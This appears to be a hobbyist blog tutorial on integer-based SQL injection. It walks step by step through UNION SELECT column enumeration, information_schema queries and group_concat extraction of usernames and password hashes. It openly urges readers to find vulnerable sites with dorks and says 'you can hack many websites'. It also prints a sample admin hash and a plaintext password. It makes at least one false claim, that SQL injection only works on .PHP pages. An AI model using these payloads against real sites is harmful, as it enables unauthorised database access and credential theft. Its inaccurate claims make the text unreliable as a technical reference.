Integer Based SQL Injection
Hello, Today I am going to share another type of SQL injection.
Integer Based SQL injection Tutorial
Lets start, get SQLi vulnerable website for practice .
I recommend this Integer Based SQLI practice website for learning and better understanding
and you can also use dorks and Server IPs for Vunerable websites.
You can hack many websites with SQLi and you can find many SQLI vulnerable websites with dorks as i said. SQL injection Only works on .PHP And .PHP?ID=
Okay so lets start
Here is our SQLi Practice website
(Without STRING ')
Now add single string after the parameter (.php?id=1)
you will get the MYSQL error or the content of page will be disappear from the page
MYSQL error: 'Query Failed You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1'
Why we use (String ')?
(String ') breaks the query and returns with the error or disappeared page.
now we need to find the total number of columns
for finding total number of columns we can use 'ORDER BY' and 'GROUP BY'
we use 'ORDER BY' & 'GROUP BY' for finding total numbers of columns
let me show you how
now use 'ORDER BY 1--' Or 'GROUP BY 1--' (Keep increasing the numbers until you will get the UNKNOWN COLUMN error)
Now find number of columns like this
NO ERROR
NO ERROR
NO ERROR
NO ERROR
NO ERROR
NO ERROR
Keep Increasing the number until you get the UNKNOWN COLUMNS error
NO ERROR
NO ERROR
NO ERROR
NO ERROR
ERROR: Query Failed Unknown column '6' in 'order clause'
ERROR: Query Failed Unknown column '6' in 'group statement'
Tt means it has '5' columns
in some webs 'ORDER BY' is waffed thats why i told you about 'GROUP BY'
(i will teach you about waf too)
okay now we want to find the number of vulnerable columns
using UNION SELECT AND THE NUMBER OF COLUMNS
Let me show you how
UNION SELECT AND THE NUMBER OF COLUMNS after the parameter and
(- It means NULL) before the parameter's number
Like this
Vulnerable column will be printed on the page as shown in the picture
now we need to find the table names
we will use
group_concat(table_name)
in the vulnerable column
and after the columns from information_schema.tables where table_schema=database()
let me show you how
vulnerable columns will be replaced with table names
Tables: 'BlueMilkshake_0,books,users'
Now look for sensitive tables like
login,admin,users,
or any which contain login information
we have table 'USERS' sensitive table or we can say it contains login information
okay now we need to find the column names
encode table 'users' in hex format
now replace group_concat(table_name) with group_concat(column_name)
and from information_schema.tables where table_schema=database()-- with
from information_schema.columns where table_name=HEX OF TABLE_NAME--
let me show you how
Column Names: id,username,password,email,level
Now find sensitive columns like : uname, username, user_name, pswd, password, pwd
we have username,password
Now last step, we need to extract the username and password column's detail
now replace group_concat(column_name) with group_concat(username,0x3a,password)
,0x3a, is a hex version of : which creates space between username:password
and replace from information_schema.columns where table_name=HEX OF TABLE_NAME--
with from TABLE_NAME
let me show you how
Columns Detail: admin:99feaba9c9dfac6c6ba036dee6d02dc1,chu:iamdixitchu
Done you have the login information of website as I said above you can hack many websites with SQLi.
I hope you enjoyed the article and learned integer Based SQLi
Thanks, Till then practice this injection and enhance your skills.
Integer Based SQL Injection
Reviewed by Unknown
on
13:20:00
Rating:
Reviewed by Unknown
on
13:20:00
Rating:
No comments